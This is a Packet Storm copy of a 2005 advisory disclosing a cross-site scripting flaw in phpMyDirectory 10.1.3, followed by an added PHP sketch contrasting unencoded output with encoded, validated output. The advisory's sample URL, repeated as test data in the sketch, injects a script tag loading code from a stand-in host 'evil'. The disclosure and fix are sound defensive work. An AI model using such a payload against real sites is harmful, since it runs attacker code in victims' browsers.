phpMyDirectory1013.txt

2005-03-25T00:00:00
ID PACKETSTORM:36812
Type packetstorm
Reporter mircia
Modified 2005-03-25T00:00:00

Description

                                        
                                            `  
  
Talte Security Advisory #3  
  
Product: phpMyDirectory 10.1.3-rel  
Homepage: http://www.phpmydirectory.com/  
Risk: low  
Type: Cross Site Scripting  
Bug Found by: "Talte Security - mircia"  
  
phpMyDirectory is a multi-purpose script  
that can be used to build  
professional yellow pages, book libraries,  
friend finders, etc.  
  
A cross-site scripting problem exists  
in the subcat, page and subsubcat variables.  
  
  
Examples:  
  
http://localhost/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script>  
  
Everything in foo.js gets executed  
  
// Best Regards - Talte security, mircia   
`
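
The advisory does not show the affected code. As an added example (not phpMyDirectory source and not from the advisory), the sketch below assumes the parameters are echoed into an HTML attribute, which is what the `">` prefix in the sample URL suggests, and shows that pattern beside an output-encoded form. All function names and the markup are hypothetical.

```php
<?php
// Added illustration only: hypothetical helpers, not phpMyDirectory code.

// Assumed vulnerable pattern: a request value is concatenated into an
// attribute with no encoding, so a double quote ends the attribute early.
function render_link_vulnerable(array $q): string
{
    $subcat = $q['subcat'] ?? '';
    return '<a href="review.php?subcat=' . $subcat . '">Reviews</a>';
}

// HTML-encode for both element and attribute context (quotes included).
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only plain strings; ?subcat[]=x would otherwise arrive as an array.
function str_param(array $q, string $key): string
{
    $v = $q[$key] ?? '';
    return is_string($v) ? $v : '';
}

function render_link_hardened(array $q): string
{
    // Assumption: page is a positive integer; anything else falls back to 1.
    $page = filter_var($q['page'] ?? '1', FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
    $params = [
        'subcat'    => str_param($q, 'subcat'),
        'subsubcat' => str_param($q, 'subsubcat'),
        'page'      => ($page === false) ? 1 : $page,
    ];
    // http_build_query() URL-encodes each value; h() then HTML-encodes the
    // finished URL so it cannot leave the href attribute.
    return '<a href="' . h('review.php?' . http_build_query($params))
         . '">Reviews</a>';
}

// Constructed request data with the same shape as the advisory's sample URL.
$q = ['id' => '1', 'cat' => '',
      'subcat' => '"><script src=http://evil/foo.js></script>'];

echo render_link_vulnerable($q), "\n"; // attribute is closed, script tag is live markup
echo render_link_hardened($q), "\n";   // value stays inside href as inert text
```

Encoding at the point of output covers every context where the three parameters are printed; validating `page` as an integer is an extra check that only applies if the application treats it as numeric.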